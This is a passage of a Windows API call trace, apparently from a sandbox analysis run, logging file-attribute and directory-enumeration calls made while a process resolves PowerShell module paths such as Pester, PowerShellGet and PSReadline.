lpOldMode=0x1b83e3c8) returned 1 [0263.047] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0263.047] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0263.047] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0263.048] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0263.048] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0263.049] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0263.049] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.049] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x32 [0263.049] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x32, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0263.050] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c5ca32, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc70f0 [0263.050] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c5ca32, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.051] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc85fdfdf, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xb914059, ftLastAccessTime.dwHighDateTime=0x1d5ace1, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.4.0", cAlternateFileName="")) returned 1 [0263.051] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0263.051] FindClose (in: hFindFile=0x1acc70f0 | out: hFindFile=0x1acc70f0) returned 1 [0263.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0263.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0263.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3d8) returned 1 [0263.052] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b83e700 | out: lpFileInformation=0x1b83e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dd42eab, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19acc93c, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x2dd42eab, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0263.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e388) returned 1 [0263.056] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0263.056] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0263.056] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0263.056] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0263.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.056] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23c1138 | out: lpFileInformation=0x23c1138*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dd42eab, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19acc93c, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x2dd42eab, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0263.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.056] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0263.057] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0263.057] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0263.057] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0263.057] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.ni.dll")) returned 0xffffffff [0263.057] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0263.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0263.058] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0263.058] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c82c9e, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7690 [0263.058] FindNextFileW (in: hFindFile=0x1acc7690, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c82c9e, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.058] FindNextFileW (in: hFindFile=0x1acc7690, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa0cfdc3c, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa0cfdc3c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="")) returned 1 [0263.059] FindNextFileW (in: hFindFile=0x1acc7690, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0263.059] FindClose (in: hFindFile=0x1acc7690 | out: hFindFile=0x1acc7690) returned 1 [0263.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.059] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0263.059] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0263.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3d8) returned 1 [0263.059] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b83e700 | out: lpFileInformation=0x1b83e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc99f6e81, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19e6001c, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x7b2a31c8, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0263.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e388) returned 1 [0263.060] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0263.060] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0263.060] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0263.060] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0263.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.060] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23c2a10 | out: lpFileInformation=0x23c2a10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc99f6e81, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x19e6001c, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x7b2a31c8, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0263.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.061] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0263.061] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0263.061] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0263.061] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0263.062] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0263.062] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0263.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.062] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0263.062] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0263.062] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c82c9e, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7210 [0263.063] FindNextFileW (in: hFindFile=0x1acc7210, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c82c9e, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xb914059, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.063] FindNextFileW (in: hFindFile=0x1acc7210, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc86241be, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa0cfdc3c, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa0cfdc3c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.0.0", cAlternateFileName="")) returned 1 [0263.063] FindNextFileW (in: hFindFile=0x1acc7210, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0263.063] FindClose (in: hFindFile=0x1acc7210 | out: hFindFile=0x1acc7210) returned 1 [0263.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.063] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0263.063] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x4c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", lpFilePart=0x0) returned 0x4b [0263.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3d8) returned 1 [0263.063] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\2.0.0\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b83e700 | out: lpFileInformation=0x1b83e700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc99f6e81, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf54a315b, ftLastAccessTime.dwHighDateTime=0x1d942b1, ftLastWriteTime.dwLowDateTime=0x7b2cb8ab, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362)) returned 1 [0263.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e388) returned 1 [0263.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0263.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x4c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", lpFilePart=0x0) returned 0x4b [0263.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0263.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", nBufferLength=0x4c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1", lpFilePart=0x0) returned 0x4b [0263.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.064] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\2.0.0\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23c43c8 | out: lpFileInformation=0x23c43c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc99f6e81, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf54a315b, ftLastAccessTime.dwHighDateTime=0x1d942b1, ftLastWriteTime.dwLowDateTime=0x7b2cb8ab, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362)) returned 1 [0263.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.065] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff [0263.065] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psm1")) returned 0xffffffff [0263.065] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.cdxml")) returned 0xffffffff [0263.065] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.xaml")) returned 0xffffffff [0263.065] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.ni.dll")) returned 0xffffffff [0263.066] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.dll")) returned 0xffffffff [0263.069] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0263.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0263.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0263.071] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c82c9e, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x6d90540, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7510 [0263.071] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7c82c9e, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x6d90540, 